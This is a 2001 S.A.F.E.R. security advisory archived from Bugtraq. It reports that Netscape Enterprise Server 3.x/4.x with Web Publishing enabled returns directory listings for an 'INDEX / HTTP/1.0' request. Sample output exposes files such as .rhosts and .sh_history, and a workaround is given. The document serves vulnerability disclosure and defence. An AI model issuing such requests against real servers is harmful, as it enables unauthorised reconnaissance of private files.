linux, säkerhet

5998395 2001-01-24 22:41 +0700  /80 rader/ Security Research Team <security@RELAYGROUP.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-24  20:17  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: security@RELAYGROUP.COM
Mottagare: Bugtraq (import) <14992>
Ärende: [SAFER] Security Bulletin 010124.EXP.1.11
------------------------------------------------------------
From: Security Research Team <security@RELAYGROUP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010124224124.B15898@relaygroup.com>

__________________________________________________________

      S.A.F.E.R. Security Bulletin 010124.EXP.1.11
__________________________________________________________


TITLE    : Netscape Enterprise Server - INDEX request problem
DATE     : January 24, 2001
NATURE   : Information gathering
AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled

PROBLEM:

Problems exists that allows remote user to obtain directory listings
on remote site running Web Publishing.

DETAILS:

It is possible to obtain directory listing on the remote web server
by issuing command:

INDEX / HTTP/1.0

Output looks like:

-- output start --

Trying 192.168.1.1...
Connected to www.example.org.
Escape character is '^]'.
INDEX / HTTP/1.0

HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain

test directory 512 979859452 0 null null
contact directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
service directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null
.profile unknown 416 975657629 264 null null

-- output end --

INDEX request will not work on 'aliased' directories (like CGI
directories and similar).

FIXES:

Netscape has been contacted on multiple occasions. First time, more
than a year ago. Although other problems we have reported have been
fixed, we have received no response for this issue - to date.

Workaround is to disable Web Publishing, or disable INDEX request
(which will, most likely, break web publishing feature).

CREDITS:

Emmanuel Gadaix <emmanuel@relaygroup.com>
Vanja Hrustic <vanja@relaygroup.com>
Fyodor Yarochkin <fyodor@relaygroup.com>


This advisory is also available at http://www.safermag.com/advisories/

__________________________________________________________

   S.A.F.E.R. - Security Alert For Enterprise Resources
          Copyright (c) 2001 The Relay Group
  http://www.safermag.com  ----  security@relaygroup.com
__________________________________________________________
(5998395) --------------------------------(Ombruten)